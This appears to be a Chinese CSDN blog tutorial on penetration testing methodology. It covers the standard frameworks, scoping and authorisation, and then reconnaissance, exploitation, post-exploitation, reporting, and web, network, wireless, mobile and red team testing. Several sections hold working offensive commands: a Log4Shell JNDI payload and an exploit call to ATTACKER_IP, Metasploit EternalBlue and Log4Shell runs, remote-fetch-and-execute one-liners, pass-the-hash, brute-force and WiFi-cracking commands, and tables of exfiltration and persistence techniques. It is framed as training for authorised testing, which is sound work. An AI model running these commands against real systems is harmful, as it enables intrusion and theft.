【提示】 本文所有技术内容仅用于授权测试、安全学习和合规防御研究。未经授权对任何系统进行渗透测试属于违法行为,作者及平台不承担任何法律责任。请确保在获得书面授权后开展所有测试活动,并严格遵守当地法律法规(如《网络安全法》《数据安全法》《个人信息保护法》等)。
1. 渗透测试方法论概述与价值
渗透测试(Penetration Testing,简称 Pentest)是通过模拟攻击者的技术手段,对目标系统进行安全评估的过程。方法论的价值在于将零散的攻击技术体系化、流程化,确保测试覆盖全面、结果可复现、结论可度量。
一篇合格的安全评估离不开标准框架的支撑。当前业界主流的方法论包括 PTES、OSSTMM、OWASP Testing Guide、NIST SP 800-115 以及 MITRE ATT&CK 评估框架。下面我们逐一展开,并给出在不同场景下的选择决策表。
2. 渗透测试标准框架详解
2.1 PTES(Penetration Testing Execution Standard)
PTES 是社区维护的渗透测试执行标准,将整个测试生命周期划分为七个阶段,是工程化落地最广泛的参考框架。
阶段 英文名 核心任务 关键产出 前期交互 Pre-Engagement Interactions 确定范围、授权、报价、ROE SOW、ROE、授权书 情报收集 Intelligence Gathering OSINT、主动侦察、被动侦察 资产清单、攻击面地图 威胁建模 Threat Modeling 资产优先级、攻击路径规划 威胁模型文档 漏洞分析 Vulnerability Analysis 扫描、验证、去重、分类 漏洞清单 漏洞利用 Exploitation PoC 验证、利用执行、成果固化 利用证据、截图 后渗透 Post Exploitation 提权、横向移动、数据提取、维持 后渗透报告、影响链 报告 Reporting 分级报告、修复建议、复测计划 最终报告、管理层摘要
2.2 OSSTMM 3.0 概述
OSSTMM(Open Source Security Testing Methodology Manual)由 ISECOM 维护,强调可度量、可审计、通道分类的科学化评估。
安全测试开源方法论 :定义统一的测试项与评估流程,不依赖工具厂商通道分类 :将测试对象划分为 Human、Physical、Wireless、Telecommunications、Data Networks 五大通道评估指标 :以 RAV(Risk Assessment Value)量化安全态势,输出可对比的度量值
通道类型 测试重点 评估指标 Human 人员安全意识、社工风险 认证合规率 Physical 物理门禁、监控、设施 物理控制有效性 Wireless WiFi、蓝牙、NFC、无线 IDS 信号暴露面 Telecommunications 电话、VoIP、传真 通道加密强度 Data Networks 主机、服务、应用、数据 RAV 评分
2.3 OWASP Testing Guide v4.2 概述
OWASP WSTG v4.2 是 Web 应用渗透测试的事实标准,将测试分为以下分类。
分类 测试重点 示例测试项 信息收集 架构、技术栈、攻击面 WAF 识别、JS 分析 配置与部署管理 服务器配置、错误处理 目录列举、旧备份 身份认证 登录、口令、找回机制 暴力破解、弱口令 会话管理 会话令牌、失效机制 会话固定、超时 授权 访问控制、越权 水平越权、垂直越权 业务逻辑 流程绕过、参数篡改 并发、顺序绕过 客户端 XSS、CSRF、CORS DOM XSS、CSRF
2.4 NIST SP 800-115 概述
NIST SP 800-115 是美国国家标准技术研究所发布的技术指南,面向政府与企业提供规划、执行、报告的完整流程,强调合规与可审计性,其四阶段为:规划、发现、攻击、报告。
2.5 MITRE ATT&CK 评估框架
MITRE ATT&CK 提供攻击者行为知识库,将渗透测试与红队评估映射到具体战术与技术,便于评估检测覆盖率和防守成熟度。
战术 阶段 渗透测试对应 Reconnaissance 侦察 被动信息收集 Initial Access 初始访问 外部打点 Execution 执行 漏洞利用 Persistence 持久化 权限维持 Privilege Escalation 提权 后渗透 Lateral Movement 横向移动 内网渗透 Exfiltration 数据外传 数据提取
2.6 各标准对比表
标准 适用范围 深度 广度 认证 PTES 全类型渗透测试 高 高 无官方认证 OSSTMM 3.0 合规度量评估 中 极高 OSSTMM 认证审计师 OWASP WSTG v4.2 Web 应用测试 极高 中 OWASP 认证 NIST SP 800-115 政府/企业合规 中 高 NIST 相关认证 MITRE ATT&CK 红队/检测评估 高 高 ATT&CK 评估
2.7 方法论选择决策表
场景 推荐框架 理由 Web 应用安全评估 OWASP WSTG + PTES 覆盖 Web 分类,结合 PTES 报告 网络与基础设施 PTES + NIST 800-115 流程规范,合规可审计 合规度量 OSSTMM 3.0 通道分类与 RAV 可量化 红队评估 PTES + MITRE ATT&CK 映射 TTPs,评估检测覆盖 移动应用 OWASP MASVS + PTES 移动专用测试 + 流程报告
3. 前期交互与授权
前期交互决定了整个测试的合法性与边界,是最容易被忽略却最关键的环节。
3.1 渗透测试类型分类表
类型 信息披露 测试视角 难度 典型场景 黑盒 无任何信息 完全外部攻击者 高 外部安全验证 白盒 全部源码与架构 内部审计视角 中 深度安全审计 灰盒 部分信息(账号、架构) 混合视角 中高 业务逻辑测试
3.2 范围定义表
维度 内容示例 备注 目标 IP 段、域名、App、API 明确资产清单 时间 2026-09-01 至 2026-09-07 含维护窗口 深度 扫描+利用+后渗透 不可越界的动作 限制 禁止 DoS、禁止数据删除 红线约束 授权人 CTO 签字 法律效力
3.3 授权与法律文件
SOW(工作说明书) :明确测试范围、交付物、时间表ROE(交战规则) :约束可执行与禁止行为保密协议(NDA) :保护客户数据授权书 :客户书面授权,含联系人、应急流程
3.4 报价与资源评估
项目 评估要素 报价参考 资产数量 IP/域名/应用数 按规模阶梯 测试深度 扫描/利用/后渗透 深度递增 人员投入 初级/中级/高级 人天计费 报告交付 标准报告/复测 附加费用
3.5 时间线规划与风险变更管理
阶段 时长占比 关键风险 变更预案 前期交互 10% 范围模糊 变更申请单 信息收集 15% 资产漂移 动态更新清单 漏洞分析 20% 误报高 人工验证 漏洞利用 25% 业务中断 立即暂停与通报 后渗透 15% 数据泄露风险 加密存储证据 报告 15% 修复建议落地难 联合评审
3.6 前期交互模板
项目名称:XX系统2026年度渗透测试
授权人:XXX(CTO)
测试范围:192.168.1.0/24、*.example.com、App v3.2
测试类型:灰盒
测试周期:2026-09-01 至 2026-09-07
限制条款:禁止 DoS、禁止删除/篡改生产数据
紧急联系人:张三 138-XXXX-XXXX
交付物:渗透测试报告、复测报告、漏洞清单
【提示】 授权书必须由目标资产所有方书面签字,明确授权人、范围、时间、限制条款与紧急联系人。口头授权无效。
4. 信息收集与侦察
信息收集是渗透测试的地基,决定了后续攻击面的广度。
4.1 被动信息收集表
类别 方法 典型工具/来源 OSINT 企业公开信息、招聘、泄露 Google、GitHub、Shodan DNS 域名解析、历史记录、Zone Transfer dig、SecurityTrails、ViewDNS 搜索引擎 Google Dork、子域名、敏感文件 Google、Bing、Fofa 社交媒体 员工邮箱、组织架构 LinkedIn、微博 企业信息 工商、备案、证书透明度 ICP 备案、crt.sh
4.2 主动信息收集表
类别 方法 典型工具 端口扫描 TCP/UDP、 SYN、全连接 nmap、masscan、rustscan 服务识别 Banner、指纹、版本 nmap -sV、finger Web 指纹 CMS、框架、中间件 wappalyzer、whatweb 目录扫描 路径、备份、敏感文件 dirsearch、ffuf、gobuster 子域名 爆破、证书、被动 subfinder、amass
4.3 信息收集工具集表
工具 用途 典型命令 nmap 端口/服务扫描 nmap -sS -sV -p- target masscan 高速端口扫描 masscan -p1-65535 --rate=10000 target dirsearch 目录扫描 dirsearch -u https://target -w wordlist.txt subfinder 子域名发现 subfinder -d example.com -all wappalyzer 技术栈识别 浏览器插件/CLI theHarvester 邮箱/域名收集 theHarvester -d example.com -b all
4.4 侦察策略与优先级
被动收集优先于主动扫描,避免过早暴露 先外部资产后内部资产 先低交互探测(DNS、证书)后高交互扫描 对生产系统使用低速率与分时段策略
4.5 完整信息收集流程与脚本
#!/bin/bash
DOMAIN = "example.com"
subfinder -d $DOMAIN -all -o subs.txt
amass enum -d $DOMAIN -o amass_subs.txt
cat subs.txt amass_subs.txt | sort -u > all_subs.txt
cat all_subs.txt | httprobe -c 50 > live_subs.txt
nmap -sS -sV -T2 --top-ports 1000 -iL live_subs.txt -oA nmap_results
while read url; do
dirsearch -u $url -w common.txt -o "dirsearch_$( echo $url | md5sum | cut -c1-8) .txt"
done < live_subs.txt
curl -s "https://crt.sh/?q=%.$DOMAIN &output=json" | jq -r '.[].name_value' | sort -u > crt_subs.txt
5. 威胁建模
威胁建模在信息收集与漏洞分析之间承上启下,用于识别高价值资产与攻击路径。
5.1 威胁建模方法论表
方法论 核心 适用场景 STRIDE 六类威胁分类 通用设计评估 Attack Tree 攻击树根节点拆解 关键资产防护 DREAD 风险评分排序 漏洞优先级 PASTA 七步风险建模 业务对齐评估
STRIDE 六类威胁:Spoofing(仿冒)、Tampering(篡改)、Repudiation(抵赖)、Information Disclosure(信息泄露)、Denial of Service(拒绝服务)、Elevation of Privilege(提权)。
5.2 攻击面分析与资产优先级
资产类型 暴露面 优先级 理由 对外 Web 应用 公网可访问 高 攻击入口 数据库 内网 高 数据核心 域控 内网 极高 权限中枢 员工终端 邮件/VPN 中 钓鱼入口 物联网关 边界 中 横向跳板
5.3 攻击路径规划
典型路径示例:外部 Web 漏洞 → Web Shell → 内网信息收集 → 域内横向 → 域控 → 全域数据提取。
5.4 威胁建模工具
工具 特点 适用 Threat Modeler 自动化、企业级 大型项目 Microsoft TMT 微软官方、STRIDE Windows 环境 OWASP Threat Dragon 开源、跨平台 Web 应用
5.5 完整威胁建模示例
资产:OA 系统(Java + MySQL + Linux)
威胁(STRIDE):
S 仿冒:弱口令、会话固定
T 篡改:文件上传覆盖配置
R 抵赖:操作日志缺失
I 泄露:SQL 注入、目录列举
D 拒绝:登录接口无限流
E 提权:越权访问管理后台
攻击路径:
外部 → 文件上传 → WebShell → 内网 → 数据库 → 数据外传
优先级:I 泄露 > E 提权 > S 仿冒 > T 篡改 > D 拒绝 > R 抵赖
6. 漏洞分析
漏洞分析阶段将扫描与人工验证结合,输出可信赖的漏洞清单。
6.1 漏洞扫描策略表
策略 目的 适用 误报率 全量扫描 全面发现 初次评估 高 针对性扫描 聚焦高危 复测、专项 中 验证扫描 去伪存真 交付前 低
6.2 漏洞扫描工具对比表
工具 类型 特点 授权 Nessus 主机漏扫 插件丰富、报告友好 商业 OpenVAS 主机漏扫 开源、社区维护 开源 Nexpose 主机漏扫 集成 Metasploit 商业 Qualys 云端漏扫 SaaS、持续监控 商业 Acunetix Web 漏扫 Web 专精 商业 Burp Suite Web 代理 人工深度测试 商业/社区
6.3 漏洞验证与去重
对扫描结果按唯一键(资产+漏洞类型+参数)去重 人工复现确认误报,记录 PoC 对同一根因的多个表象合并为一个根因项
6.4 误报分析
误报原因 识别方法 处置 版本指纹不准 手动确认版本 标注排除 修补未生效 验证补丁状态 复测确认 环境差异 同环境复现 标注环境
6.5 漏洞分类与优先级评估表
维度 含义 示例 CVSS 基础评分 0-10 9.8 严重 EPSS 被利用概率 0.95 高概率 业务影响 资产价值与损失 核心数据库为极高
【提示】 CVSS 高不等于必须立刻修,应结合 EPSS(被利用概率)与业务影响综合排序。一个 CVSS 6.5 但 EPSS 0.9 的漏洞,优先级往往高于 CVSS 9.0 但 EPSS 0.01 的漏洞。
6.6 完整漏洞分析流程
nessuscli scan export --format csv --scan-id 123 -o scan.csv
nuclei -l live_subs.txt -t cves/2026/ -severity high,critical -o nuclei_high.txt
python3 - << 'PY'
import csv, json
seen = {}
with open('scan.csv') as f:
for row in csv.DictReader(f):
key = (row['host'], row['cve'], row['port'])
if key not in seen:
seen[key] = row
out = sorted(seen.values(), key=lambda r: float(r.get('cvss','0')), reverse=True)
json.dump(out, open('vulns_sorted.json','w'), indent=2, ensure_ascii=False)
print(f"去重后漏洞数: {len(out)}")
PY
7. 漏洞利用实战
漏洞利用是验证漏洞真实危害的关键环节,必须在授权范围内执行。
7.1 漏洞利用方法论
步骤 任务 产出 验证 确认漏洞存在 PoC 确认 PoC 获取/编写利用代码 可执行 PoC 适配 针对目标环境调整 适配后的 payload 执行 在授权窗口执行 利用证据 验证成果 确认影响范围 影响记录
7.2 常见漏洞利用表
类型 漏洞 利用要点 Web 漏洞 SQL 注入、XSS、文件上传、SSRF 参数污染、绕过 WAF 服务漏洞 RCE、反序列化、弱口令 版本对应 PoC 配置漏洞 默认凭据、目录可写、匿名访问 枚举与组合利用 逻辑漏洞 越权、并发、支付绕过 流程篡改
7.3 漏洞利用工具集
工具 用途 典型用法 Metasploit 综合利用框架 use exploit/…; set RHOSTS; exploit sqlmap SQL 注入自动化 sqlmap -u “url?id=1” --batch --dbs nuclei 模板化 PoC 扫描 nuclei -t cves/ -l targets.txt searchsploit 漏洞 PoC 检索 searchsploit apache 2.4
7.4 漏洞利用流程与文档
漏洞编号:VULN-2026-001
漏洞名称:Apache Log4j RCE
目标:192.168.1.10:8443
PoC 来源:searchsploit log4j
适配说明:目标为 Windows,使用 JNDI LDAP 回链
执行时间:2026-09-02 14:00(授权窗口)
执行命令:java -jar JNDIExploit.jar -i ATTACKER_IP
结果:获得 SYSTEM 权限 Shell
影响:可完全控制目标主机,存在横向风险
7.5 完整漏洞利用记录模板
msf6 > use exploit/multi/http/log4shell_header_injection
msf6 > set RHOSTS 192.168 .1.10
msf6 > set RPORT 8443
msf6 > set SSL true
msf6 > set LHOST 10.0 .0.5
msf6 > set LPORT 4444
msf6 > set TARGET 0
msf6 > exploit
sessions -l
sessions -i 1
getuid
sysinfo
【提示】 所有利用动作必须在授权时间窗口内执行,并完整记录命令、参数、时间与结果,作为报告证据链。对生产业务的高危利用应先与客户确认维护窗口。
8. 后渗透与权限维持
后渗透阶段评估漏洞被利用后的真实业务影响,是体现深度价值的关键。
8.1 后渗透方法论表
阶段 任务 关键产出 信息收集 主机、网络、凭据、数据 内网拓扑 权限提升 内核/服务/配置提权 root/SYSTEM 横向移动 跨主机、跨域 新主机控制 数据提取 加密外传、留证 影响证据 权限维持 持久化后门 恢复访问能力 痕迹清理 清理日志与残留 合规退出
8.2 权限提升路径表
系统 常见路径 检查点 Linux 内核漏洞、SUID、Sudo 配置、Cron、PATH 劫持 linpeas、pspy Windows 内核漏洞、服务路径未引用、令牌 impersonate、AlwaysInstallElevated winpeas、PowerUp
8.3 横向移动路径表
技术 原理 典型工具 Pass-the-Hash NTLM 哈希复用 CrackMapExec、Impacket Pass-the-Ticket Kerberos 票据复用 Rubeus、kekeo SSH 密钥 私钥复用 ssh -i WMI 远程管理 wmiexec.py PsExec 远程执行 Impacket psexec.py
8.4 数据提取方法表
方法 通道 检测难度 加密通道 HTTPS/TLS C2 高 隐写术 图片/文件嵌入 高 DNS 隧道 DNS 查询外传 中 HTTP 隧道 隧道封装 中
8.5 权限维持技术表
技术 系统 检测难度 服务 Windows/Linux 中 计划任务 Windows/Linux 中 Web 后门 跨平台 高 Rootkit 内核级 极高
8.6 完整后渗透流程
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
sudo -l
find / -perm -4000 -type f 2 > /dev/null
powershell -c "iex(iwr -UseBasicParsing https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEAS.ps1)"
python3 psexec.py DOMAIN/user:[email protected]
python3 wmiexec.py DOMAIN/user:[email protected]
crackmapexec smb 192.168 .1.0/24 -u administrator -H Aad3b4b5e.. .
【提示】 后渗透阶段的痕迹清理不是掩盖攻击,而是合规退出,确保测试结束后客户环境恢复原状。所有获取的数据必须加密存储并在交付后销毁。
9. 报告编写与交付
报告是渗透测试的最终交付物,决定了客户能否落地修复。
9.1 渗透测试报告结构表
章节 内容 受众 执行摘要 总体风险、关键发现、建议 管理层 测试范围与方法 资产、类型、框架 全员 漏洞描述 标题、描述、PoC、截图 技术团队 影响分析 CVSS、业务影响 管理层+技术 修复建议 短期/中期/长期 技术团队 附录 工具清单、原始数据 运维团队
9.2 报告分级表
级别 受众 重点 管理层报告 CIO/CSO/CISO 风险、合规、投入产出 技术报告 研发/安全 漏洞细节、PoC、修复 运维报告 运维/SRE 配置修复、验证步骤
9.3 漏洞描述模板
【漏洞标题】Apache Log4j 远程代码执行(CVE-2021-44228)
【漏洞描述】目标系统使用存在缺陷的 Log4j 组件,攻击者可通过构造 JNDI
请求触发远程代码执行。
【影响范围】192.168.1.10:8443(OA 系统)
【CVSS 评分】10.0(严重)
【PoC】
curl -H 'X-Api-Version: ${jndi:ldap://attacker/Exploit}' \
https://192.168.1.10:8443/api
【截图】见附录 Fig-001
【修复建议】升级 Log4j 至 2.17.1+,并移除 JNDI 查找功能。
9.4 修复优先级矩阵表
级别 定义 响应时间 示例 立即 严重且可被远程利用 24 小时 RCE、未授权访问核心 高 高危且有公开 PoC 7 天 SQL 注入、提权 中 中危或需前置条件 30 天 XSS、信息泄露 低 低危或影响有限 90 天 配置加固建议
9.5 完整报告模板
# XX 系统 2026 年度渗透测试报告
## 一、执行摘要
本次测试共发现漏洞 23 个,其中严重 3、高危 7、中危 9、低危 4。
整体风险等级:高。建议优先修复 3 个严重漏洞。
## 二、测试范围与方法
资产:OA、CRM、API 网关
类型:灰盒
框架:PTES + OWASP WSTG v4.2
## 三、漏洞清单(见附录 A)
## 四、影响分析
严重漏洞可导致核心数据泄露与内网失陷。
## 五、修复建议(按优先级)
## 六、附录
工具清单、原始扫描数据、PoC 录屏
10. Web 应用渗透测试流程
10.1 OWASP Testing Guide v4.2 测试分类表
分类 测试项数 重点 信息收集 9 架构、WAF、JS 配置管理 10 目录、错误处理、备份 身份认证 11 暴力破解、找回、多因素 会话管理 7 令牌、失效、固定 授权 6 水平/垂直越权 业务逻辑 6 流程绕过、并发 客户端 11 XSS、CSRF、CORS
10.2 Web 测试 checklist 表(精选)
序号 测试项 期望结果 1 登录暴力破解防护 失败次数锁定 2 默认/弱口令检测 不存在弱口令 3 SQL 注入(GET/POST) 参数化查询 4 XSS(反射/存储/DOM) 输出编码 5 文件上传类型校验 白名单校验 6 SSRF 出网限制 7 目录列举禁止 无目录列表 8 会话令牌随机性 高熵 9 会话超时 闲置失效 10 水平越权 权限校验 11 垂直越权 角色校验 12 CSRF Token 防伪令牌 13 CORS 配置 白名单域 14 敏感数据传输加密 TLS 1.2+ 15 错误信息泄露 无堆栈泄露 16 API 速率限制 限流 17 JWT 签名校验 强算法 18 反向钩子/点击劫持 X-Frame-Options 19 旧备份文件 已清理 20 JS 敏感信息 无密钥硬编码
10.3 Web 测试工具集
工具 用途 备注 Burp Suite 代理、扫描、Repeater Web 测试主力 OWASP ZAP 开源代理扫描 免费 nuclei 模板化漏扫 批量 sqlmap SQL 注入自动化 脱库 XSStrike XSS 检测 生成 payload
10.4 完整 Web 应用测试流程
sqlmap -g "site:example.com" --batch --smart
nuclei -u https://target -t cves/ -t exposures/ -severity medium,high,critical
ffuf -w wordlist.txt -u https://target/FUZZ -mc 200,301 ,302,401,403
subfinder -d example.com -all | httprobe | nuclei -t takeovers/
11. 网络渗透测试流程
11.1 网络渗透测试分类表
类型 视角 重点 外部测试 公网攻击者 边界设备、暴露服务 内部测试 内网攻击者 横向移动、域安全 无线测试 近场攻击者 WiFi、蓝牙
11.2 网络测试 checklist 表
序号 测试项 工具 1 端口扫描(TCP/UDP) nmap 2 服务版本识别 nmap -sV 3 主机漏洞扫描 Nessus/OpenVAS 4 弱口令爆破 hydra 5 SMB 枚举 enum4linux 6 域信息收集 BloodHound 7 横向移动验证 Impacket 8 防火墙规则探测 nmap --script firewall-bypass 9 VPN 配置审计 检查配置 10 网络设备默认凭据 设备清单核对
11.3 网络测试工具集
工具 用途 nmap 端口与服务扫描 Nessus 漏洞扫描 Metasploit 漏洞利用 CrackMapExec 内网批量枚举与利用 Impacket 协议级操作套件 BloodHound 域内攻击路径分析
11.4 完整网络渗透测试流程
nmap -sS -Pn -p- -T4 --min-rate 1000 203.0 .113.0/24 -oA external_scan
crackmapexec smb 192.168 .1.0/24 -u '' -p '' --shares
crackmapexec smb 192.168 .1.0/24 -u user -p pass --rid
bloodhound-python -d domain.local -u user -p pass -c All
hydra -L users.txt -P pass.txt ssh://192.168.1.0/24 -t 4
hydra -L users.txt -P pass.txt rdp://192.168.1.0/24 -t 4
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; \
set RHOSTS 192.168.1.20; set LHOST 10.0.0.5; exploit"
12. 社会工程学测试流程
12.1 社工测试范围与授权
社会工程学测试必须获得明确书面授权,包含可使用的诱饵模板、目标群体、回退机制与不可触碰的红线(如不得针对特定个人、不得造成业务停摆)。
12.2 社工测试方法表
方法 形式 目标 钓鱼 邮件/短信/语音 凭据窃取 电话 冒充 IT/高管 信息套取 物理 门禁尾随、桌面搜索 物理边界 USB 诱饵设备投放 主机控制
12.3 社工测试 checklist 表
序号 测试项 1 钓鱼邮件模拟(含培训链接) 2 仿冒登录页凭据收集 3 电话冒充 IT 索要凭据 4 物理尾随进入办公区 5 USB 诱饵投放 6 桌面敏感文件检查 7 员工安全意识问答
12.4 风险评估与缓解
指标 计算 目标 钓鱼点击率 点击人数/发送人数 <10% 凭据提交率 提交/发送 <5% 上报率 上报/发送 >50%
【提示】 社工测试结果应作为安全意识培训的输入,不得用于惩罚员工。测试完成后必须向所有目标发送说明与培训材料。
13. 无线网络渗透测试
13.1 无线测试分类表
类型 协议 重点 WiFi 802.11 加密、认证、客户端 蓝牙 BLE 配对、服务枚举 NFC ISO 14443 中继、克隆
13.2 WiFi 测试 checklist 表
序号 测试项 1 AP 发现与信号测绘 2 加密强度(WPA2/3) 3 认证方式(PSK/802.1X) 4 客户端隔离 5 蜜罐 AP 检测 6 管理帧保护(PMF) 7 默认凭据检查 8 信号泄漏范围
13.3 无线测试工具集
工具 用途 aircrack-ng 抓包与破解套件 reaver WPS 破解 wifite 自动化 WiFi 测试 kismet 被动发现与测绘 bettercap 中间人与欺骗
13.4 完整无线测试流程
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bypass AP_BSSID -w capture wlan0mon
aircrack-ng -w wordlist.txt capture-01.cap
reaver -i wlan0mon -b AP_BSSID -vv
kismet -c wlan0mon
14. 移动应用渗透测试
14.1 移动测试分类表
平台 文件格式 重点 Android APK/AAB 反编译、组件、存储 iOS IPA 越狱、Keychain、ATS
14.2 移动测试 checklist 表
序号 测试项 1 反编译与代码审查 2 本地存储敏感数据 3 通信加密与证书校验 4 硬编码密钥/令牌 5 认证与会话管理 6 组件导出与越权(Android) 7 WebView 漏洞 8 深度链接劫持 9 客户端校验绕过 10 第三方 SDK 隐私合规
14.3 移动测试工具集
工具 用途 Frida 动态注入与 Hook objection Frida 封装,移动测试利器 JADX APK 反编译 apktool APK 资源解包 MobSF 移动应用自动化扫描
14.4 完整移动测试流程
apktool d app.apk -o app_src
jadx -d app_java app.apk
frida -U -l hook.js -f com.example.app
objection -g com.example.app explore
mobsfscan app_src/
15. 红队评估与渗透测试
15.1 红队评估 vs 渗透测试对比表
维度 渗透测试 红队评估 目标 发现漏洞 验证整体防御 范围 预定义资产 不预设,以目标达成为准 时长 数天至数周 数周至数月 隐蔽性 可见 隐蔽、模拟真实 APT 蓝队参与 已知测试 蓝队不知情(紫队协调) 产出 漏洞报告 检测覆盖率与响应评估
15.2 红队评估流程表
阶段 任务 产出 目标定义 确定夺旗目标 ROE 侦察 OSINT、资产测绘 入口清单 初始访问 钓鱼、边界利用、供应链 首个据点 内网渗透 提权、横向、域控 目标达成 目标达成 夺旗(如数据库/域控) 证据 报告 TTPs、检测差距、改进 评估报告
15.3 红队 TTPs 映射(MITRE ATT&CK)
战术 示例技术 ATT&CK ID Initial Access 鱼叉钓鱼 T1566 Execution 计划任务 T1053 Persistence 服务创建 T1543 Privilege Escalation 令牌操纵 T1134 Lateral Movement PtH T1550 Exfiltration 加密通道 T1041
15.4 红队评估 checklist 表
序号 检查项 1 目标与红线已书面确认 2 C2 基础设施搭建并伪装 3 鱼叉钓鱼载荷免杀 4 初始据点建立 5 内网横向路径规划 6 检测盲区记录 7 目标达成证据固化 8 蓝队响应评估
15.5 完整红队评估方案
项目:XX 集团 2026 红队评估
目标:核心数据库访问凭据获取
周期:4 周(含隐蔽期)
范围:不预设,以达成目标为准
禁止:破坏可用性、对外泄露数据
C2:域名伪装 + CDN 隧道
载荷:定制免杀 + 计划任务持久化
评估重点:边界检测、内网横向告警、响应时效
16. 自动化与持续安全
16.1 渗透测试自动化脚本编写(Python)
import subprocess, json, ipaddress
from concurrent. futures import ThreadPoolExecutor, as_completed
TARGETS = [ "192.168.1.0/24" ]
REPORT = { }
def expand_cidr ( cidr) :
return [ str ( ip) for ip in ipaddress. ip_network( cidr, strict= False ) . hosts( ) ]
def scan_host ( ip) :
try :
r = subprocess. run(
[ "nmap" , "-sS" , "-sV" , "-T4" , "--top-ports" , "100" , ip] ,
capture_output= True , text= True , timeout= 120
)
return ip, r. stdout
except subprocess. TimeoutExpired:
return ip, "TIMEOUT"
hosts = [ ]
for c in TARGETS:
hosts. extend( expand_cidr( c) )
with ThreadPoolExecutor( max_workers= 20 ) as ex:
futures = { ex. submit( scan_host, h) : h for h in hosts}
for f in as_completed( futures) :
ip, out = f. result( )
if "open" in out:
REPORT[ ip] = out
with open ( "auto_recon.json" , "w" ) as f:
json. dump( REPORT, f, indent= 2 , ensure_ascii= False )
print ( f"存活开放端口主机: { len ( REPORT) } " )
16.2 持续安全评估方案
机制 频率 工具 定期漏扫 每周 Nessus/OpenVAS 持续资产监控 实时 攻击面管理平台 代码安全扫描 每次提交 SAST/SCA DAST 扫描 每日 OWASP ZAP 红蓝对抗 每季度 紫队演练
16.3 DevSecOps 中的渗透测试集成
阶段 集成点 工具示例 编码 IDE 插件、预提交扫描 SonarLint、Semgrep 构建 SAST、SCA SonarQube、Trivy 测试 DAST、fuzz OWASP ZAP、ffuf 部署 基线扫描、镜像扫描 Trivy、kube-bench 运营 持续监控、威胁狩猎 SIEM、EDR
16.4 漏洞管理生命周期
发现 → 分类 → 评估优先级 → 分派修复 → 验证复测 → 关闭归档
↑__________________________|
未通过则回到修复
16.5 完整自动化方案
stages :
- sast
- sca
- dast
- gate
sast :
stage : sast
script :
- semgrep - - config=auto - - json - o sast.json .
artifacts :
paths : [ sast.json]
sca :
stage : sca
script :
- trivy fs - - exit- code 1 - - severity HIGH, CRITICAL .
dast :
stage : dast
script :
- zap- baseline.py - t https: //staging.example.com
rules :
- if : $CI_COMMIT_BRANCH == "main"
gate :
stage : gate
script :
- python3 vuln_gate.py - - max- critical 0 - - max- high 2
allow_failure : false
17. 总结与参考资源
17.1 渗透测试 checklist 总表(精选汇总)
类别 检查项数 重点 前期交互 10 授权、范围、ROE 信息收集 15 被动+主动 威胁建模 10 STRIDE、攻击路径 漏洞分析 15 扫描、验证、去重 漏洞利用 12 PoC、适配、证据 后渗透 12 提权、横向、维持 报告 8 分级、修复矩阵 Web 测试 20 OWASP WSTG 网络测试 10 端口、服务、域 社工 7 钓鱼、物理 无线 8 WiFi、蓝牙 移动 10 反编译、存储 红队 8 TTPs、检测差距 自动化 10 CI/CD、持续评估 合计 155+ 全流程覆盖
17.2 工具速查表
阶段 首选工具 备选 信息收集 nmap、subfinder masscan、amass 漏洞扫描 Nessus、nuclei OpenVAS、Burp 漏洞利用 Metasploit、sqlmap searchsploit 后渗透 Impacket、PEASS-ng CrackMapExec Web Burp Suite OWASP ZAP 移动 Frida、objection MobSF 无线 aircrack-ng wifite 报告 自建模板 Dradis、Faraday
17.3 认证资源表
认证 颁发 定位 难度 OSCP Offensive Security 渗透入门实战 高 OSCE Offensive Security 高级渗透 极高 OSEP Offensive Security 绕过与利用 极高 CRTO Zero-Point Security 红队操作 高 CISSP ISC2 安全管理 中高
17.4 参考资源列表
资源 来源 用途 PTES pentest-standard.org 渗透流程标准 OSSTMM 3. isecom.org 度量化评估 OWASP WSTG v4.2 owasp.org Web 测试指南 NIST SP 800-115 nist.gov 技术指南 MITRE ATT&CK attack.mitre.org 攻击行为知识库 Exploit-DB exploit-db.com PoC 仓库 CVSS Calculator first.org 漏洞评分
17.5 合规声明
本文所述渗透测试方法论与技术内容仅适用于以下场景:已获得书面授权的安全评估、企业内部安全建设与防御研究、合规的安全培训与学习。任何未经授权的扫描、探测、利用行为均属违法,可能违反《网络安全法》《数据安全法》《个人信息保护法》及相关刑法条款。使用者须自行承担一切法律责任,作者与发布平台不承担任何连带责任。
【提示】 安全技术的根本目的是提升防御能力。掌握攻击方法是为了更好地防守,请始终在合法合规的框架内使用这些知识,做一名负责任的安全从业者。
作者:CSDN 网络安全博客专家 | 更新日期:2026-08-24 | 标签:渗透测试、PTES、OSSTMM、OWASP、红队评估、DevSecOps
转载自 CSDN-专业IT技术社区
原文链接:https://blog.csdn.net/xlb8888888/article/details/164027625